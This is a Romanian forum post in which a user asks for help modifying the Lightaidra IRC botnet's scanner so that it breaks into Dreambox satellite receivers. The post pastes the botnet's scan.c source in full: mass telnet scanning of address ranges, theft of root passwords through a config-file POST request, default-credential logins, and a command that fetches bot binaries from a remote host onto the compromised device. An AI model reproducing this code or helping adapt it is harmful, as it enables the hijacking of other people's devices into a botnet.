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  1. In primul rand va salut pe toti.Am gasit si eu tot pe aici scanner-ul/botnet-ul lightaidra. Treaba e ca intra doar in routere si tot felul de ciudatenii. M-am uitat peste fisierul scan.c si stiu unde trebuie modificat pt ce imi trebuie mie(receivere de sat mipsel/ppc) Ce am eu nevoie(partea de autentificare) e asa: ############################## welcome on your dreambox! - Kernel 2.6.9 (18:54:07). dreambox login: root Password: BusyBox v1.01 (2009.12.12-13:19+0000) Built-in shell (ash) Enter 'help' for a list of built-in commands. root@dreambox:~> #################################### sau asa: #################################### welcome on your dreambox! Kernel 2.6.18-7.4-dm500hd (#1 SMP Fri Feb 24 16:00:00 CET 2012). dm500hd login: root Password: root@dm500hd:~# #################################### din ce am vazut in scan.c cred ca da failure chiar daca intra in ele deoarece nu ii apare lui ce-i trebuie dupa ce baga parola: ##################################################################### /* cmd_advscan_getpass(sock_t *) */ /* advance scanner password finder. */ int cmd_advscan_getpass(sock_t *scan_sp) { char temp[801]; char *one, *two; if (sockwrite(scan_sp->sockfd, post_request) == false) return EXIT_FAILURE; recv(scan_sp->sockfd, temp, 100, 0); recv(scan_sp->sockfd, temp, 800, 0); one = strtok(temp, "<"); while (one != NULL) { if (strstr(one, "password>")) { two = strtok(one, ">"); while (two != NULL) { if (strcmp(two, "password") != true) { snprintf(psw_x, strlen(two) + 3, "%s\r\n", two); return EXIT_SUCCESS; } two = strtok(NULL, ">"); } } one = strtok(NULL, "<"); } return EXIT_FAILURE; } /* * scan.c - USE LIGHTAIDRA AT YOUR OWN RISK! * * Lightaidra - IRC-based mass router scanner/exploiter. * Copyright (C) Federico Fazzi, <federico@ahacktivia.org>. * */ #include "../include/headers.h" int sockwrite(int sd, const char *fmt, ...); int cmd_advscan_getpass(sock_t *scan_sp); void *scan_address(scan_data_t *scan_data); int cmd_advscan_control(char *addr, sock_t *sp, requests_t *req, unsigned short type); int cmd_advscan_join(char *addr, sock_t *sp, requests_t *req, unsigned short type); /* cmd_scan_central(sock_t *, requests_t *, unsigned short) */ /* start scanner with vuln type. */ void cmd_scan_central(sock_t *sp, requests_t *req, unsigned short type) { unsigned short a, b, c; int i, x; pthread_t pthds[maxthreads]; scan_data_t scan_data[maxthreads]; total = 0; founds = 0; c = 0; sleep(2); remove(result_file); resfd = fopen(result_file, "a+"); if (resfd == NULL) { sockwrite(sp->sockfd, "PRIVMSG %s :[error] unable to open: %s\n", channel, result_file); sockwrite(sp->sockfd, "QUOTE ZOMBIE\n"); exit(EXIT_FAILURE); } memset(hosts, 0, sizeof hosts); for (a = 0; a <= 255; a++) { for (b = 0; b <= 255; b++) { snprintf(hosts[c], sizeof(hosts[c]), "%s.%s.%d.%d", req->rcv_sb, req->rcv_sc, a, ; c++; } } for (i = 0; i <= maxhosts;) { if (strlen(hosts[i]) < 7) break; for (x = 0; x < maxthreads; x++, i++) { if (strlen(hosts[i]) < 7) break; memset(scan_data[x].hostname, 0, sizeof(scan_data[x].hostname)); snprintf(scan_data[x].hostname, 31, "%s", hosts[i]); if (pthread_create (&pthds[x], NULL, (void *)&scan_address, (scan_data_t *) & scan_data[x]) != 0) { if(all_messages) sockwrite(sp->sockfd, "PRIVMSG %s :[crash] scanner has crashed, continuing to pwning..\n", channel); goto crash; } } for (x = 0; x < maxthreads; x++) { if (strlen(hosts[i]) < 7) break; if (pthread_join(pthds[x], NULL) != 0) { if(all_messages) sockwrite(sp->sockfd, "PRIVMSG %s :[crash] scanner has crashed, continuing to pwning..\n", channel); goto crash; } } } crash: if (!total) { if(all_messages) sockwrite(sp->sockfd, "PRIVMSG %s :[advscan] scanner completed, founds %d ips..\n", channel, total); exit(EXIT_SUCCESS); } else { if(all_messages) sockwrite(sp->sockfd, "PRIVMSG %s :[advscan] scanner completed, founds %d ips, pwning time..\n", channel, total); } if ((resfd = fopen(result_file, "r+")) == NULL) { sockwrite(sp->sockfd, "PRIVMSG %s :[error] unable to open: %s\n", channel, result_file); sockwrite(sp->sockfd, "QUOTE ZOMBIE\n"); exit(EXIT_FAILURE); } while (fgets(resbuf, sizeof(resbuf) - 1, resfd) != NULL) { sscanf(resbuf, "%16s", restag); if (cmd_advscan_control(restag, sp, req, type) == 0) { if (all_messages) { if (type == 1) { sockwrite(sp->sockfd, "PRIVMSG %s :[vuln] address: %s (user:%s pass:%s) possible vuln with default password!\n", channel, restag, req->rcv_sd, req->rcv_se); } else if (type == 2) { strncpy(psw_y, psw_x, strlen(psw_x) - 2); sockwrite(sp->sockfd, "PRIVMSG %s :[vuln] address: %s (user:root pass:%s) possible vuln with config file post request!\n", channel, restag, psw_y); } } } memset(restag, 0, sizeof restag); } fclose(resfd); sockwrite(sp->sockfd, "QUOTE ZOMBIE\n"); exit(EXIT_FAILURE); } /* scan_address(scan_data_t *) */ /* start addresses scanner. */ void *scan_address(scan_data_t *scan_data) { FILE *rfd; int retv, flags; fd_set rd, wr; char temp[128]; sock_t *scan_isp; scan_isp = (sock_t *) malloc(sizeof(sock_t)); if (!(scan_isp->sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP))) pthread_exit(NULL); memset(temp, 0, sizeof temp); memset(&scan_isp->sockadr, 0, sizeof scan_isp->sockadr); scan_isp->sockadr.sin_port = htons(telnet_port); scan_isp->sockadr.sin_family = AF_INET; timeout_value = 1; tm.tv_sec = timeout_value; tm.tv_usec = 500000; if (!inet_aton((const char *)scan_data->hostname, (struct in_addr *)&scan_isp->sockadr.sin_addr)) { close(scan_isp->sockfd); free(scan_isp); pthread_exit(NULL); } flags = fcntl(scan_isp->sockfd, F_GETFL, 0); if (fcntl(scan_isp->sockfd, F_SETFL, O_NONBLOCK) == false) { close(scan_isp->sockfd); free(scan_isp); pthread_exit(NULL); } if (connect(scan_isp->sockfd, (struct sockaddr *)&scan_isp->sockadr, sizeof(scan_isp->sockadr)) == -1) { if (errno != EINPROGRESS) { close(scan_isp->sockfd); free(scan_isp); pthread_exit(NULL); } } FD_SET(scan_isp->sockfd, &wr); if (!(retv = select(scan_isp->sockfd + 1, NULL, &wr, NULL, &tm))) { close(scan_isp->sockfd); free(scan_isp); pthread_exit(NULL); } else if (retv == false) { close(scan_isp->sockfd); free(scan_isp); pthread_exit(NULL); } if (recv(scan_isp->sockfd, temp, sizeof(temp) - 1, 0) != false) //-- { close(scan_isp->sockfd); free(scan_isp); pthread_exit(NULL); } if (errno != EWOULDBLOCK) { close(scan_isp->sockfd); free(scan_isp); pthread_exit(NULL); } FD_SET(scan_isp->sockfd, &rd); if (!(retv = select(scan_isp->sockfd + 1, &rd, NULL, NULL, &tm))) { close(scan_isp->sockfd); free(scan_isp); pthread_exit(NULL); } else if (retv == -1) { close(scan_isp->sockfd); free(scan_isp); pthread_exit(NULL); } else { if ((fcntl(scan_isp->sockfd, F_SETFL, flags)) == false) { close(scan_isp->sockfd); free(scan_isp); pthread_exit(NULL); } if (recv(scan_isp->sockfd, temp, sizeof(temp) - 1, 0) != false) { rfd = fopen(result_file, "a+"); if (rfd != NULL) { fprintf(rfd, "%s\n", scan_data->hostname); fflush(rfd); fclose(rfd); total++; } } } close(scan_isp->sockfd); free(scan_isp); pthread_exit(NULL); } /* __alarm() */ /* for socket timeout. */ void __alarm() { close(scan_sp->sockfd); return; } /* cmd_advscan_control(char *, sock_t *, requests_t *) */ /* advance scanner init. */ int cmd_advscan_control(char *addr, sock_t *sp, requests_t *req, unsigned short type) { if (type == 1) { if (cmd_advscan_join(addr, sp, req, 1) == true) { founds++; return EXIT_SUCCESS; } else return EXIT_FAILURE; } else if (type == 2) { scan_sp = (sock_t *) malloc(sizeof(sock_t)); scan_sp->sockhs = gethostbyname(addr); scan_sp->sockfd = socket(AF_INET, SOCK_STREAM, 0); scan_sp->sockadr.sin_family = AF_INET; scan_sp->sockadr.sin_port = htons(http_port); scan_sp->sockadr.sin_addr = *((struct in_addr *)scan_sp->sockhs->h_addr); memset(scan_sp->sockadr.sin_zero, '\0', sizeof scan_sp->sockadr.sin_zero); timeout_value = 1; tm.tv_sec = timeout_value; tm.tv_usec = 500000; signal(SIGALRM, __alarm); alarm(timeout_value); if (connect (scan_sp->sockfd, (struct sockaddr *)&scan_sp->sockadr, sizeof scan_sp->sockadr) == false) { alarm(0); signal(SIGALRM, SIG_DFL); free(scan_sp); return EXIT_FAILURE; } if (cmd_advscan_getpass(scan_sp) == true) { close(scan_sp->sockfd); free(scan_sp); if (cmd_advscan_join(addr, sp, req, 2) == true) { founds++; return EXIT_SUCCESS; } else return EXIT_FAILURE; } } close(scan_sp->sockfd); free(scan_sp); return EXIT_FAILURE; } /* cmd_advscan_getpass(sock_t *) */ /* advance scanner password finder. */ int cmd_advscan_getpass(sock_t *scan_sp) { char temp[801]; char *one, *two; if (sockwrite(scan_sp->sockfd, post_request) == false) return EXIT_FAILURE; recv(scan_sp->sockfd, temp, 100, 0); recv(scan_sp->sockfd, temp, 800, 0); one = strtok(temp, "<"); while (one != NULL) { if (strstr(one, "password>")) { two = strtok(one, ">"); while (two != NULL) { if (strcmp(two, "password") != true) { snprintf(psw_x, strlen(two) + 3, "%s\r\n", two); return EXIT_SUCCESS; } two = strtok(NULL, ">"); } } one = strtok(NULL, "<"); } return EXIT_FAILURE; } /* cmd_advscan_join(char *, sock_t *, requests_t *) */ /* advance scanner (router validate control). */ int cmd_advscan_join(char *addr, sock_t *sp, requests_t *req, unsigned short type) { unsigned short e = 0; scan_sp = (sock_t *) malloc(sizeof(sock_t)); scan_sp->sockhs = gethostbyname(addr); scan_sp->sockfd = socket(AF_INET, SOCK_STREAM, 0); scan_sp->sockadr.sin_family = AF_INET; scan_sp->sockadr.sin_port = htons(telnet_port); scan_sp->sockadr.sin_addr = *((struct in_addr *)scan_sp->sockhs->h_addr); memset(scan_sp->sockadr.sin_zero, '\0', sizeof scan_sp->sockadr.sin_zero); timeout_value = 2; tm.tv_sec = timeout_value; tm.tv_usec = 500000; setsockopt(scan_sp->sockfd, SOL_SOCKET, SO_RCVTIMEO,(char *)&tm,sizeof(struct timeval)); /* ignore ++ KILLED BY SIGPIPE ++ */ signal(SIGPIPE, SIG_IGN); signal(SIGALRM, __alarm); alarm(timeout_value); if (connect(scan_sp->sockfd, (struct sockaddr *)&scan_sp->sockadr, sizeof scan_sp->sockadr) == false) { alarm(0); signal(SIGALRM, SIG_DFL); free(scan_sp); return EXIT_FAILURE; } if (type == 1) { if (sockwrite(scan_sp->sockfd, "%s\r\n", req->rcv_sd) == false) e++; recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0); if (sockwrite(scan_sp->sockfd, "%s\r\n", req->rcv_se) == false) e++; recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0); } else if (type == 2) { if (send(scan_sp->sockfd, "root\r\n", strlen("root\r\n"), MSG_NOSIGNAL) == false) e++; recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0); send(scan_sp->sockfd, psw_x, strlen(psw_x), MSG_NOSIGNAL); recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0); } if (e) { close(scan_sp->sockfd); free(scan_sp); return EXIT_FAILURE; } memset(__netbuf, 0, sizeof __netbuf); recv_bytes = recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0); if (recv_bytes == -1) { close(scan_sp->sockfd); free(scan_sp); return EXIT_FAILURE; } __netbuf[recv_bytes] = 0; if (strchr(__netbuf, '#') != NULL || strchr(__netbuf, '$') != NULL) { sockwrite(scan_sp->sockfd, getbinaries, reference_http); recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0); recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0); sleep(3); close(scan_sp->sockfd); free(scan_sp); return EXIT_SUCCESS; } close(scan_sp->sockfd); free(scan_sp); return EXIT_FAILURE; } Nu prea am inteles ..am tot incercat sa modific valorile de mai sus dar fara nici un rezultat. Am cautat pe google tutoriale despre C si de o sapt tot caut dar nu prea am gasit ce sa ma ajute si stiu ca pt multi de aici e un lucru banal.. Va multumesc pt ajutor oricat de mic ar fi el. Toate cele bune.
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